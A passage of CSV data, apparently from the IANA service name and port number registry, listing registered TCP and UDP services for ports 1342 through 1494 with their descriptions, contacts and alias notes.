esbroker,1342,udp,ESBroker,[Alexander_Medvinsky],[Alexander_Medvinsky],,,,,, re101,1343,tcp,re101,[Doriano_Blengino],[Doriano_Blengino],,,,,, re101,1343,udp,re101,[Doriano_Blengino],[Doriano_Blengino],,,,,, icap,1344,tcp,ICAP,[Jeremy_Elson],[Jeremy_Elson],,,,,, icap,1344,udp,ICAP,[Jeremy_Elson],[Jeremy_Elson],,,,,, vpjp,1345,tcp,VPJP,[Michael_Collins],[Michael_Collins],,,,,, vpjp,1345,udp,VPJP,[Michael_Collins],[Michael_Collins],,,,,, alta-ana-lm,1346,tcp,Alta Analytics License Manager,,,,,,,, alta-ana-lm,1346,udp,Alta Analytics License Manager,,,,,,,, bbn-mmc,1347,tcp,multi media conferencing,,,,,,,, bbn-mmc,1347,udp,multi media conferencing,,,,,,,, bbn-mmx,1348,tcp,multi media conferencing,,,,,,,, bbn-mmx,1348,udp,multi media conferencing,,,,,,,, sbook,1349,tcp,Registration Network Protocol,,,,,,,, sbook,1349,udp,Registration Network Protocol,,,,,,,, editbench,1350,tcp,Registration Network Protocol,[Simson_L_Garfinkel],[Simson_L_Garfinkel],,,,,, editbench,1350,udp,Registration Network Protocol,[Simson_L_Garfinkel],[Simson_L_Garfinkel],,,,,, equationbuilder,1351,tcp,Digital Tool Works (MIT),[Terrence_J_Talbot],[Terrence_J_Talbot],,,,,, equationbuilder,1351,udp,Digital Tool Works (MIT),[Terrence_J_Talbot],[Terrence_J_Talbot],,,,,, lotusnote,1352,tcp,Lotus Note,[Greg_Pflaum],[Greg_Pflaum],1992-07,,,,, lotusnote,1352,udp,Lotus Note,[Greg_Pflaum],[Greg_Pflaum],1992-07,,,,, relief,1353,tcp,Relief Consulting,[John_Feiler],[John_Feiler],,,,,, relief,1353,udp,Relief Consulting,[John_Feiler],[John_Feiler],,,,,, XSIP-network,1354,tcp,Five Across XSIP Network,[Glenn_Reid],[Glenn_Reid],,,,,, XSIP-network,1354,udp,Five Across XSIP Network,[Glenn_Reid],[Glenn_Reid],,,,,, intuitive-edge,1355,tcp,Intuitive Edge,[Montgomery_Zukowski],[Montgomery_Zukowski],,,,,, intuitive-edge,1355,udp,Intuitive Edge,[Montgomery_Zukowski],[Montgomery_Zukowski],,,,,, cuillamartin,1356,tcp,CuillaMartin Company,,,,,,,, cuillamartin,1356,udp,CuillaMartin Company,,,,,,,, pegboard,1357,tcp,Electronic PegBoard,[Chris_Cuilla],[Chris_Cuilla],,,,,, pegboard,1357,udp,Electronic PegBoard,[Chris_Cuilla],[Chris_Cuilla],,,,,, connlcli,1358,tcp,CONNLCLI,,,,,,,, connlcli,1358,udp,CONNLCLI,,,,,,,, ftsrv,1359,tcp,FTSRV,[Ines_Homem_de_Melo],[Ines_Homem_de_Melo],,,,,, ftsrv,1359,udp,FTSRV,[Ines_Homem_de_Melo],[Ines_Homem_de_Melo],,,,,, mimer,1360,tcp,MIMER,[Per_Schroeder],[Per_Schroeder],,,,,, mimer,1360,udp,MIMER,[Per_Schroeder],[Per_Schroeder],,,,,, linx,1361,tcp,LinX,[Steffen_Schilke],[Steffen_Schilke],,,,,, linx,1361,udp,LinX,[Steffen_Schilke],[Steffen_Schilke],,,,,, timeflies,1362,tcp,TimeFlies,[Doug_Kent],[Doug_Kent],,,,,, timeflies,1362,udp,TimeFlies,[Doug_Kent],[Doug_Kent],,,,,, ndm-requester,1363,tcp,Network DataMover Requester,,,,,,,, ndm-requester,1363,udp,Network DataMover Requester,,,,,,,, ndm-server,1364,tcp,Network DataMover Server,[Toshio_Watanabe],[Toshio_Watanabe],,,,,, ndm-server,1364,udp,Network DataMover Server,[Toshio_Watanabe],[Toshio_Watanabe],,,,,, adapt-sna,1365,tcp,Network Software Associates,[Jeffery_Chiao],[Jeffery_Chiao],,,,,, adapt-sna,1365,udp,Network Software Associates,[Jeffery_Chiao],[Jeffery_Chiao],,,,,, netware-csp,1366,tcp,Novell NetWare Comm Service Platform,[Laurie_Lindsey],[Laurie_Lindsey],,,,,, netware-csp,1366,udp,Novell NetWare Comm Service Platform,[Laurie_Lindsey],[Laurie_Lindsey],,,,,, dcs,1367,tcp,DCS,[Stefan_Siebert],[Stefan_Siebert],,,,,, dcs,1367,udp,DCS,[Stefan_Siebert],[Stefan_Siebert],,,,,, screencast,1368,tcp,ScreenCast,[Bill_Tschumy],[Bill_Tschumy],,,,,, screencast,1368,udp,ScreenCast,[Bill_Tschumy],[Bill_Tschumy],,,,,, gv-us,1369,tcp,GlobalView to Unix Shell,,,,,,,, gv-us,1369,udp,GlobalView to Unix Shell,,,,,,,, us-gv,1370,tcp,Unix Shell to GlobalView,[Makoto_Mita],[Makoto_Mita],,,,,, us-gv,1370,udp,Unix Shell to GlobalView,[Makoto_Mita],[Makoto_Mita],,,,,, fc-cli,1371,tcp,Fujitsu Config Protocol,,,,,,,, fc-cli,1371,udp,Fujitsu Config Protocol,,,,,,,, fc-ser,1372,tcp,Fujitsu Config Protocol,[Ryuichi_Horie],[Ryuichi_Horie],,,,,, fc-ser,1372,udp,Fujitsu Config Protocol,[Ryuichi_Horie],[Ryuichi_Horie],,,,,, chromagrafx,1373,tcp,Chromagrafx,[Mike_Barthelemy],[Mike_Barthelemy],,,,,, chromagrafx,1373,udp,Chromagrafx,[Mike_Barthelemy],[Mike_Barthelemy],,,,,, molly,1374,tcp,EPI Software Systems,[Jim_Vlcek],[Jim_Vlcek],,,,,, molly,1374,udp,EPI Software Systems,[Jim_Vlcek],[Jim_Vlcek],,,,,, bytex,1375,tcp,Bytex,[Mary_Ann_Burt],[Mary_Ann_Burt],,,,,, bytex,1375,udp,Bytex,[Mary_Ann_Burt],[Mary_Ann_Burt],,,,,, ibm-pps,1376,tcp,IBM Person to Person Software,[Simon_Phipps],[Simon_Phipps],,,,,, ibm-pps,1376,udp,IBM Person to Person Software,[Simon_Phipps],[Simon_Phipps],,,,,, cichlid,1377,tcp,Cichlid License Manager,[Andy_Burgess],[Andy_Burgess],,,,,, cichlid,1377,udp,Cichlid License Manager,[Andy_Burgess],[Andy_Burgess],,,,,, elan,1378,tcp,Elan License Manager,[Ken_Greer],[Ken_Greer],,,,,, elan,1378,udp,Elan License Manager,[Ken_Greer],[Ken_Greer],,,,,, dbreporter,1379,tcp,Integrity Solutions,[Tim_Dawson],[Tim_Dawson],,,,,, dbreporter,1379,udp,Integrity Solutions,[Tim_Dawson],[Tim_Dawson],,,,,, telesis-licman,1380,tcp,Telesis Network License Manager,[Karl_Schendel_Jr],[Karl_Schendel_Jr],,,,,, telesis-licman,1380,udp,Telesis Network License Manager,[Karl_Schendel_Jr],[Karl_Schendel_Jr],,,,,, apple-licman,1381,tcp,Apple Network License Manager,[Earl_Wallace],[Earl_Wallace],,,,,, apple-licman,1381,udp,Apple Network License Manager,[Earl_Wallace],[Earl_Wallace],,,,,, udt-os,1382,tcp,"udt_os IANA assigned this well-formed service name as a replacement for ""udt_os"".",,,,,,,, udt_os,1382,tcp,udt_os,,,,,,,,"This entry is an alias to ""udt-os"". This entry is now historic, not usable for use with many common service discovery mechanisms." udt-os,1382,udp,"udt_os IANA assigned this well-formed service name as a replacement for ""udt_os"".",,,,,,,, udt_os,1382,udp,udt_os,,,,,,,,"This entry is an alias to ""udt-os"". This entry is now historic, not usable for use with many common service discovery mechanisms." gwha,1383,tcp,GW Hannaway Network License Manager,[J_Gabriel_Foster],[J_Gabriel_Foster],,,,,, gwha,1383,udp,GW Hannaway Network License Manager,[J_Gabriel_Foster],[J_Gabriel_Foster],,,,,, os-licman,1384,tcp,Objective Solutions License Manager,[Donald_Cornwell],[Donald_Cornwell],,,,,, os-licman,1384,udp,Objective Solutions License Manager,[Donald_Cornwell],[Donald_Cornwell],,,,,, atex-elmd,1385,tcp,"Atex Publishing License Manager IANA assigned this well-formed service name as a replacement for ""atex_elmd"".",[Brett_Sorenson],[Brett_Sorenson],,,,,, atex_elmd,1385,tcp,Atex Publishing License Manager,[Brett_Sorenson],[Brett_Sorenson],,,,,,"This entry is an alias to ""atex-elmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." atex-elmd,1385,udp,"Atex Publishing License Manager IANA assigned this well-formed service name as a replacement for ""atex_elmd"".",[Brett_Sorenson],[Brett_Sorenson],,,,,, atex_elmd,1385,udp,Atex Publishing License Manager,[Brett_Sorenson],[Brett_Sorenson],,,,,,"This entry is an alias to ""atex-elmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." checksum,1386,tcp,CheckSum License Manager,[Andreas_Glocker],[Andreas_Glocker],,,,,, checksum,1386,udp,CheckSum License Manager,[Andreas_Glocker],[Andreas_Glocker],,,,,, cadsi-lm,1387,tcp,Computer Aided Design Software Inc LM,[Sulistio_Muljadi],[Sulistio_Muljadi],,,,,, cadsi-lm,1387,udp,Computer Aided Design Software Inc LM,[Sulistio_Muljadi],[Sulistio_Muljadi],,,,,, objective-dbc,1388,tcp,Objective Solutions DataBase Cache,[Donald_Cornwell_2],[Donald_Cornwell_2],,,,,, objective-dbc,1388,udp,Objective Solutions DataBase Cache,[Donald_Cornwell_2],[Donald_Cornwell_2],,,,,, iclpv-dm,1389,tcp,Document Manager,,,,,,,, iclpv-dm,1389,udp,Document Manager,,,,,,,, iclpv-sc,1390,tcp,Storage Controller,,,,,,,, iclpv-sc,1390,udp,Storage Controller,,,,,,,, iclpv-sas,1391,tcp,Storage Access Server,,,,,,,, iclpv-sas,1391,udp,Storage Access Server,,,,,,,, iclpv-pm,1392,tcp,Print Manager,,,,,,,, iclpv-pm,1392,udp,Print Manager,,,,,,,, iclpv-nls,1393,tcp,Network Log Server,,,,,,,, iclpv-nls,1393,udp,Network Log Server,,,,,,,, iclpv-nlc,1394,tcp,Network Log Client,,,,,,,, iclpv-nlc,1394,udp,Network Log Client,,,,,,,, iclpv-wsm,1395,tcp,PC Workstation Manager software,[A_P_Hobson],[A_P_Hobson],,,,,, iclpv-wsm,1395,udp,PC Workstation Manager software,[A_P_Hobson],[A_P_Hobson],,,,,, dvl-activemail,1396,tcp,DVL Active Mail,,,,,,,, dvl-activemail,1396,udp,DVL Active Mail,,,,,,,, audio-activmail,1397,tcp,Audio Active Mail,,,,,,,, audio-activmail,1397,udp,Audio Active Mail,,,,,,,, video-activmail,1398,tcp,Video Active Mail,[Avshalom_Houri],[Avshalom_Houri],,,,,, video-activmail,1398,udp,Video Active Mail,[Avshalom_Houri],[Avshalom_Houri],,,,,, cadkey-licman,1399,tcp,Cadkey License Manager,,,,,,,, cadkey-licman,1399,udp,Cadkey License Manager,,,,,,,, cadkey-tablet,1400,tcp,Cadkey Tablet Daemon,[Joe_McCollough],[Joe_McCollough],,,,,, cadkey-tablet,1400,udp,Cadkey Tablet Daemon,[Joe_McCollough],[Joe_McCollough],,,,,, goldleaf-licman,1401,tcp,Goldleaf License Manager,[John_Fox],[John_Fox],,,,,, goldleaf-licman,1401,udp,Goldleaf License Manager,[John_Fox],[John_Fox],,,,,, prm-sm-np,1402,tcp,Prospero Resource Manager,,,,,,,, prm-sm-np,1402,udp,Prospero Resource Manager,,,,,,,, prm-nm-np,1403,tcp,Prospero Resource Manager,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, prm-nm-np,1403,udp,Prospero Resource Manager,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, igi-lm,1404,tcp,Infinite Graphics License Manager,,,,,,,, igi-lm,1404,udp,Infinite Graphics License Manager,,,,,,,, ibm-res,1405,tcp,IBM Remote Execution Starter,,,,,,,, ibm-res,1405,udp,IBM Remote Execution Starter,,,,,,,, netlabs-lm,1406,tcp,NetLabs License Manager,,,,,,,, netlabs-lm,1406,udp,NetLabs License Manager,,,,,,,, dbsa-lm,1407,tcp,DBSA License Manager,[Scott_Shattuck],[Scott_Shattuck],,,,,, dbsa-lm,1407,udp,DBSA License Manager,[Scott_Shattuck],[Scott_Shattuck],,,,,, sophia-lm,1408,tcp,Sophia License Manager,[Eric_Brown],[Eric_Brown],,,,,, sophia-lm,1408,udp,Sophia License Manager,[Eric_Brown],[Eric_Brown],,,,,, here-lm,1409,tcp,Here License Manager,[David_Ison],[David_Ison],,,,,, here-lm,1409,udp,Here License Manager,[David_Ison],[David_Ison],,,,,, hiq,1410,tcp,HiQ License Manager,[Rick_Pugh],[Rick_Pugh],,,,,, hiq,1410,udp,HiQ License Manager,[Rick_Pugh],[Rick_Pugh],,,,,, af,1411,tcp,AudioFile,[Jim_Gettys],[Jim_Gettys],,,,,, af,1411,udp,AudioFile,[Jim_Gettys],[Jim_Gettys],,,,,, innosys,1412,tcp,InnoSys,,,,,,,, innosys,1412,udp,InnoSys,,,,,,,, innosys-acl,1413,tcp,Innosys-ACL,[Eric_Welch],[Eric_Welch],,,,,, innosys-acl,1413,udp,Innosys-ACL,[Eric_Welch],[Eric_Welch],,,,,, ibm-mqseries,1414,tcp,IBM MQSeries,[Roger_Meli],[Roger_Meli],,,,,, ibm-mqseries,1414,udp,IBM MQSeries,[Roger_Meli],[Roger_Meli],,,,,, dbstar,1415,tcp,DBStar,[Jeffrey_Millman],[Jeffrey_Millman],,,,,, dbstar,1415,udp,DBStar,[Jeffrey_Millman],[Jeffrey_Millman],,,,,, novell-lu6-2,1416,tcp,"Novell LU6.2 IANA assigned this well-formed service name as a replacement for ""novell-lu6.2"".",[Peter_Liu],[Peter_Liu],,,,,, novell-lu6.2,1416,tcp,Novell LU6.2,[Peter_Liu],[Peter_Liu],,,,,,"This entry is an alias to ""novell-lu6-2"". This entry is now historic, not usable for use with many common service discovery mechanisms." novell-lu6-2,1416,udp,"Novell LU6.2 IANA assigned this well-formed service name as a replacement for ""novell-lu6.2"".",[Peter_Liu],[Peter_Liu],,,,,, novell-lu6.2,1416,udp,Novell LU6.2,[Peter_Liu],[Peter_Liu],,,,,,"This entry is an alias to ""novell-lu6-2"". This entry is now historic, not usable for use with many common service discovery mechanisms." timbuktu-srv1,1417,tcp,Timbuktu Service 1 Port,,,,,,,, timbuktu-srv1,1417,udp,Timbuktu Service 1 Port,,,,,,,, timbuktu-srv2,1418,tcp,Timbuktu Service 2 Port,,,,,,,, timbuktu-srv2,1418,udp,Timbuktu Service 2 Port,,,,,,,, timbuktu-srv3,1419,tcp,Timbuktu Service 3 Port,,,,,,,, timbuktu-srv3,1419,udp,Timbuktu Service 3 Port,,,,,,,, timbuktu-srv4,1420,tcp,Timbuktu Service 4 Port,[Marc_Epard],[Marc_Epard],,,,,, timbuktu-srv4,1420,udp,Timbuktu Service 4 Port,[Marc_Epard],[Marc_Epard],,,,,, gandalf-lm,1421,tcp,Gandalf License Manager,[gilmer],[gilmer],,,,,, gandalf-lm,1421,udp,Gandalf License Manager,[gilmer],[gilmer],,,,,, autodesk-lm,1422,tcp,Autodesk License Manager,[David_Ko],[David_Ko],,,,,, autodesk-lm,1422,udp,Autodesk License Manager,[David_Ko],[David_Ko],,,,,, essbase,1423,tcp,Essbase Arbor Software,,,,,,,, essbase,1423,udp,Essbase Arbor Software,,,,,,,, hybrid,1424,tcp,Hybrid Encryption Protocol,[Howard_Hart],[Howard_Hart],,,,,, hybrid,1424,udp,Hybrid Encryption Protocol,[Howard_Hart],[Howard_Hart],,,,,, zion-lm,1425,tcp,Zion Software License Manager,[David_Ferrero],[David_Ferrero],,,,,, zion-lm,1425,udp,Zion Software License Manager,[David_Ferrero],[David_Ferrero],,,,,, sais,1426,tcp,Satellite-data Acquisition System 1,[Bill_Taylor],[Bill_Taylor],,,,,, sais,1426,udp,Satellite-data Acquisition System 1,[Bill_Taylor],[Bill_Taylor],,,,,, mloadd,1427,tcp,mloadd monitoring tool,[Bob_Braden_2],[Bob_Braden_2],,,,,, mloadd,1427,udp,mloadd monitoring tool,[Bob_Braden_2],[Bob_Braden_2],,,,,, informatik-lm,1428,tcp,Informatik License Manager,[Harald_Schlangmann],[Harald_Schlangmann],,,,,, informatik-lm,1428,udp,Informatik License Manager,[Harald_Schlangmann],[Harald_Schlangmann],,,,,, nms,1429,tcp,Hypercom NMS,,,,,,,, nms,1429,udp,Hypercom NMS,,,,,,,, tpdu,1430,tcp,Hypercom TPDU,[Noor_Chowdhury],[Noor_Chowdhury],,,,,, tpdu,1430,udp,Hypercom TPDU,[Noor_Chowdhury],[Noor_Chowdhury],,,,,, rgtp,1431,tcp,Reverse Gossip Transport,[Ian_Jackson],[Ian_Jackson],,,,,, rgtp,1431,udp,Reverse Gossip Transport,[Ian_Jackson],[Ian_Jackson],,,,,, blueberry-lm,1432,tcp,Blueberry Software License Manager,[Steve_Beigel],[Steve_Beigel],,,,,, blueberry-lm,1432,udp,Blueberry Software License Manager,[Steve_Beigel],[Steve_Beigel],,,,,, ms-sql-s,1433,tcp,Microsoft-SQL-Server,,,,,,,, ms-sql-s,1433,udp,Microsoft-SQL-Server,,,,,,,, ms-sql-m,1434,tcp,Microsoft-SQL-Monitor,[Peter_Hussey],[Peter_Hussey],,,,,, ms-sql-m,1434,udp,Microsoft-SQL-Monitor,[Peter_Hussey],[Peter_Hussey],,,,,, ibm-cics,1435,tcp,IBM CICS,[Geoff_Meacock],[Geoff_Meacock],,,,,, ibm-cics,1435,udp,IBM CICS,[Geoff_Meacock],[Geoff_Meacock],,,,,, saism,1436,tcp,Satellite-data Acquisition System 2,[Bill_Taylor],[Bill_Taylor],,,,,, saism,1436,udp,Satellite-data Acquisition System 2,[Bill_Taylor],[Bill_Taylor],,,,,, tabula,1437,tcp,Tabula,[Marcelo_Einhorn],[Marcelo_Einhorn],,,,,, tabula,1437,udp,Tabula,[Marcelo_Einhorn],[Marcelo_Einhorn],,,,,, eicon-server,1438,tcp,Eicon Security Agent/Server,,,,,,,, eicon-server,1438,udp,Eicon Security Agent/Server,,,,,,,, eicon-x25,1439,tcp,Eicon X25/SNA Gateway,,,,,,,, eicon-x25,1439,udp,Eicon X25/SNA Gateway,,,,,,,, eicon-slp,1440,tcp,Eicon Service Location Protocol,[Pat_Calhoun],[Pat_Calhoun],,,,,, eicon-slp,1440,udp,Eicon Service Location Protocol,[Pat_Calhoun],[Pat_Calhoun],,,,,, cadis-1,1441,tcp,Cadis License Management,,,,,,,, cadis-1,1441,udp,Cadis License Management,,,,,,,, cadis-2,1442,tcp,Cadis License Management,[Todd_Wichers],[Todd_Wichers],,,,,, cadis-2,1442,udp,Cadis License Management,[Todd_Wichers],[Todd_Wichers],,,,,, ies-lm,1443,tcp,Integrated Engineering Software,[David_Tong],[David_Tong],,,,,, ies-lm,1443,udp,Integrated Engineering Software,[David_Tong],[David_Tong],,,,,, marcam-lm,1444,tcp,Marcam License Management,[Therese_Hunt],[Therese_Hunt],,,,,, marcam-lm,1444,udp,Marcam License Management,[Therese_Hunt],[Therese_Hunt],,,,,, proxima-lm,1445,tcp,Proxima License Manager,,,,,,,, proxima-lm,1445,udp,Proxima License Manager,,,,,,,, ora-lm,1446,tcp,Optical Research Associates License Manager,,,,,,,, ora-lm,1446,udp,Optical Research Associates License Manager,,,,,,,, apri-lm,1447,tcp,Applied Parallel Research LM,[Jim_Dillon],[Jim_Dillon],,,,,, apri-lm,1447,udp,Applied Parallel Research LM,[Jim_Dillon],[Jim_Dillon],,,,,, oc-lm,1448,tcp,OpenConnect License Manager,[Sue_Barnhill],[Sue_Barnhill],,,,,, oc-lm,1448,udp,OpenConnect License Manager,[Sue_Barnhill],[Sue_Barnhill],,,,,, peport,1449,tcp,PEport,[Qentin_Neill],[Qentin_Neill],,,,,, peport,1449,udp,PEport,[Qentin_Neill],[Qentin_Neill],,,,,, dwf,1450,tcp,Tandem Distributed Workbench Facility,[Mike_Bert],[Mike_Bert],,,,,, dwf,1450,udp,Tandem Distributed Workbench Facility,[Mike_Bert],[Mike_Bert],,,,,, infoman,1451,tcp,IBM Information Management,[Karen_Burns],[Karen_Burns],,,,,, infoman,1451,udp,IBM Information Management,[Karen_Burns],[Karen_Burns],,,,,, gtegsc-lm,1452,tcp,GTE Government Systems License Man,[Mike_Gregory],[Mike_Gregory],,,,,, gtegsc-lm,1452,udp,GTE Government Systems License Man,[Mike_Gregory],[Mike_Gregory],,,,,, genie-lm,1453,tcp,Genie License Manager,[Paul_Applegate],[Paul_Applegate],,,,,, genie-lm,1453,udp,Genie License Manager,[Paul_Applegate],[Paul_Applegate],,,,,, interhdl-elmd,1454,tcp,"interHDL License Manager IANA assigned this well-formed service name as a replacement for ""interhdl_elmd"".",[Eli_Sternheim],[Eli_Sternheim],,,,,, interhdl_elmd,1454,tcp,interHDL License Manager,[Eli_Sternheim],[Eli_Sternheim],,,,,,"This entry is an alias to ""interhdl-elmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." interhdl-elmd,1454,udp,"interHDL License Manager IANA assigned this well-formed service name as a replacement for ""interhdl_elmd"".",[Eli_Sternheim],[Eli_Sternheim],,,,,, interhdl_elmd,1454,udp,interHDL License Manager,[Eli_Sternheim],[Eli_Sternheim],,,,,,"This entry is an alias to ""interhdl-elmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." esl-lm,1455,tcp,ESL License Manager,[Abel_Chou],[Abel_Chou],,,,,, esl-lm,1455,udp,ESL License Manager,[Abel_Chou],[Abel_Chou],,,,,, dca,1456,tcp,DCA,[Jeff_Garbers_2],[Jeff_Garbers_2],,,,,, dca,1456,udp,DCA,[Jeff_Garbers_2],[Jeff_Garbers_2],,,,,, valisys-lm,1457,tcp,Valisys License Manager,[Leslie_Lincoln],[Leslie_Lincoln],,,,,, valisys-lm,1457,udp,Valisys License Manager,[Leslie_Lincoln],[Leslie_Lincoln],,,,,, nrcabq-lm,1458,tcp,Nichols Research Corp.,[Howard_Cole],[Howard_Cole],,,,,, nrcabq-lm,1458,udp,Nichols Research Corp.,[Howard_Cole],[Howard_Cole],,,,,, proshare1,1459,tcp,Proshare Notebook Application,,,,,,,, proshare1,1459,udp,Proshare Notebook Application,,,,,,,, proshare2,1460,tcp,Proshare Notebook Application,[Robin_Kar],[Robin_Kar],,,,,, proshare2,1460,udp,Proshare Notebook Application,[Robin_Kar],[Robin_Kar],,,,,, ibm-wrless-lan,1461,tcp,"IBM Wireless LAN IANA assigned this well-formed service name as a replacement for ""ibm_wrless_lan"".",[flanne],[flanne],,,,,, ibm_wrless_lan,1461,tcp,IBM Wireless LAN,[flanne],[flanne],,,,,,"This entry is an alias to ""ibm-wrless-lan"". This entry is now historic, not usable for use with many common service discovery mechanisms." ibm-wrless-lan,1461,udp,"IBM Wireless LAN IANA assigned this well-formed service name as a replacement for ""ibm_wrless_lan"".",[flanne],[flanne],,,,,, ibm_wrless_lan,1461,udp,IBM Wireless LAN,[flanne],[flanne],,,,,,"This entry is an alias to ""ibm-wrless-lan"". This entry is now historic, not usable for use with many common service discovery mechanisms." world-lm,1462,tcp,World License Manager,[Michael_S_Amirault],[Michael_S_Amirault],,,,,, world-lm,1462,udp,World License Manager,[Michael_S_Amirault],[Michael_S_Amirault],,,,,, nucleus,1463,tcp,Nucleus,[Venky_Nagar],[Venky_Nagar],,,,,, nucleus,1463,udp,Nucleus,[Venky_Nagar],[Venky_Nagar],,,,,, msl-lmd,1464,tcp,"MSL License Manager IANA assigned this well-formed service name as a replacement for ""msl_lmd"".",[Matt_Timmermans],[Matt_Timmermans],,,,,, msl_lmd,1464,tcp,MSL License Manager,[Matt_Timmermans],[Matt_Timmermans],,,,,,"This entry is an alias to ""msl-lmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." msl-lmd,1464,udp,"MSL License Manager IANA assigned this well-formed service name as a replacement for ""msl_lmd"".",[Matt_Timmermans],[Matt_Timmermans],,,,,, msl_lmd,1464,udp,MSL License Manager,[Matt_Timmermans],[Matt_Timmermans],,,,,,"This entry is an alias to ""msl-lmd"". This entry is now historic, not usable for use with many common service discovery mechanisms." pipes,1465,tcp,Pipes Platform,[Mark_Farlin],[Mark_Farlin],,,,,, pipes,1465,udp,Pipes Platform,[Mark_Farlin],[Mark_Farlin],,,,,, oceansoft-lm,1466,tcp,Ocean Software License Manager,[Randy_Leonard],[Randy_Leonard],,,,,, oceansoft-lm,1466,udp,Ocean Software License Manager,[Randy_Leonard],[Randy_Leonard],,,,,, csdmbase,1467,tcp,CSDMBASE,,,,,,,, csdmbase,1467,udp,CSDMBASE,,,,,,,, csdm,1468,tcp,CSDM,[Robert_Stabl],[Robert_Stabl],,,,,, csdm,1468,udp,CSDM,[Robert_Stabl],[Robert_Stabl],,,,,, aal-lm,1469,tcp,Active Analysis Limited License Manager,[David_Snocken],[David_Snocken],,,,,, aal-lm,1469,udp,Active Analysis Limited License Manager,[David_Snocken],[David_Snocken],,,,,, uaiact,1470,tcp,Universal Analytics,[Mark_R_Ludwig],[Mark_R_Ludwig],,,,,, uaiact,1470,udp,Universal Analytics,[Mark_R_Ludwig],[Mark_R_Ludwig],,,,,, csdmbase,1471,tcp,csdmbase,,,,,,,, csdmbase,1471,udp,csdmbase,,,,,,,, csdm,1472,tcp,csdm,[Robert_Stabl],[Robert_Stabl],,,,,, csdm,1472,udp,csdm,[Robert_Stabl],[Robert_Stabl],,,,,, openmath,1473,tcp,OpenMath,[Garth_Mayville],[Garth_Mayville],,,,,, openmath,1473,udp,OpenMath,[Garth_Mayville],[Garth_Mayville],,,,,, telefinder,1474,tcp,Telefinder,[Jim_White],[Jim_White],,,,,, telefinder,1474,udp,Telefinder,[Jim_White],[Jim_White],,,,,, taligent-lm,1475,tcp,Taligent License Manager,[Mark_Sapsford],[Mark_Sapsford],,,,,, taligent-lm,1475,udp,Taligent License Manager,[Mark_Sapsford],[Mark_Sapsford],,,,,, clvm-cfg,1476,tcp,clvm-cfg,[Eric_Soderberg],[Eric_Soderberg],,,,,, clvm-cfg,1476,udp,clvm-cfg,[Eric_Soderberg],[Eric_Soderberg],,,,,, ms-sna-server,1477,tcp,ms-sna-server,,,,,,,, ms-sna-server,1477,udp,ms-sna-server,,,,,,,, ms-sna-base,1478,tcp,ms-sna-base,[Gordon_Mangione],[Gordon_Mangione],,,,,, ms-sna-base,1478,udp,ms-sna-base,[Gordon_Mangione],[Gordon_Mangione],,,,,, dberegister,1479,tcp,dberegister,[Brian_Griswold],[Brian_Griswold],,,,,, dberegister,1479,udp,dberegister,[Brian_Griswold],[Brian_Griswold],,,,,, pacerforum,1480,tcp,PacerForum,[Peter_Caswell],[Peter_Caswell],,,,,, pacerforum,1480,udp,PacerForum,[Peter_Caswell],[Peter_Caswell],,,,,, airs,1481,tcp,AIRS,[Bruce_Wilson],[Bruce_Wilson],,,,,, airs,1481,udp,AIRS,[Bruce_Wilson],[Bruce_Wilson],,,,,, miteksys-lm,1482,tcp,Miteksys License Manager,[Shane_McRoberts],[Shane_McRoberts],,,,,, miteksys-lm,1482,udp,Miteksys License Manager,[Shane_McRoberts],[Shane_McRoberts],,,,,, afs,1483,tcp,AFS License Manager,[Michael_R_Pizolato],[Michael_R_Pizolato],,,,,, afs,1483,udp,AFS License Manager,[Michael_R_Pizolato],[Michael_R_Pizolato],,,,,, confluent,1484,tcp,Confluent License Manager,[James_Greenfiel],[James_Greenfiel],,,,,, confluent,1484,udp,Confluent License Manager,[James_Greenfiel],[James_Greenfiel],,,,,, lansource,1485,tcp,LANSource,[Christopher_Wells],[Christopher_Wells],,,,,, lansource,1485,udp,LANSource,[Christopher_Wells],[Christopher_Wells],,,,,, nms-topo-serv,1486,tcp,"nms_topo_serv IANA assigned this well-formed service name as a replacement for ""nms_topo_serv"".",[Sylvia_Siu],[Sylvia_Siu],,,,,, nms_topo_serv,1486,tcp,nms_topo_serv,[Sylvia_Siu],[Sylvia_Siu],,,,,,"This entry is an alias to ""nms-topo-serv"". This entry is now historic, not usable for use with many common service discovery mechanisms." nms-topo-serv,1486,udp,"nms_topo_serv IANA assigned this well-formed service name as a replacement for ""nms_topo_serv"".",[Sylvia_Siu],[Sylvia_Siu],,,,,, nms_topo_serv,1486,udp,nms_topo_serv,[Sylvia_Siu],[Sylvia_Siu],,,,,,"This entry is an alias to ""nms-topo-serv"". This entry is now historic, not usable for use with many common service discovery mechanisms." localinfosrvr,1487,tcp,LocalInfoSrvr,[Brian_Matthews_2],[Brian_Matthews_2],,,,,, localinfosrvr,1487,udp,LocalInfoSrvr,[Brian_Matthews_2],[Brian_Matthews_2],,,,,, docstor,1488,tcp,DocStor,[Brian_Spears],[Brian_Spears],,,,,, docstor,1488,udp,DocStor,[Brian_Spears],[Brian_Spears],,,,,, dmdocbroker,1489,tcp,dmdocbroker,[Razmik_Abnous],[Razmik_Abnous],,,,,, dmdocbroker,1489,udp,dmdocbroker,[Razmik_Abnous],[Razmik_Abnous],,,,,, insitu-conf,1490,tcp,insitu-conf,[Paul_Blacknell],[Paul_Blacknell],,,,,, insitu-conf,1490,udp,insitu-conf,[Paul_Blacknell],[Paul_Blacknell],,,,,, ,1491,,Unassigned,,,,2009-08-05,,,Unauthorized Use Known on port 1491, stone-design-1,1492,tcp,stone-design-1,[Andrew_Stone],[Andrew_Stone],,,,,, stone-design-1,1492,udp,stone-design-1,[Andrew_Stone],[Andrew_Stone],,,,,, netmap-lm,1493,tcp,"netmap_lm IANA assigned this well-formed service name as a replacement for ""netmap_lm"".",[Phillip_Magson],[Phillip_Magson],,,,,, netmap_lm,1493,tcp,netmap_lm,[Phillip_Magson],[Phillip_Magson],,,,,,"This entry is an alias to ""netmap-lm"". This entry is now historic, not usable for use with many common service discovery mechanisms." netmap-lm,1493,udp,"netmap_lm IANA assigned this well-formed service name as a replacement for ""netmap_lm"".",[Phillip_Magson],[Phillip_Magson],,,,,, netmap_lm,1493,udp,netmap_lm,[Phillip_Magson],[Phillip_Magson],,,,,,"This entry is an alias to ""netmap-lm"". This entry is now historic, not usable for use with many common service discovery mechanisms." ica,1494,tcp,ica,[John_Richardson],[John_Richardson],,,,,, 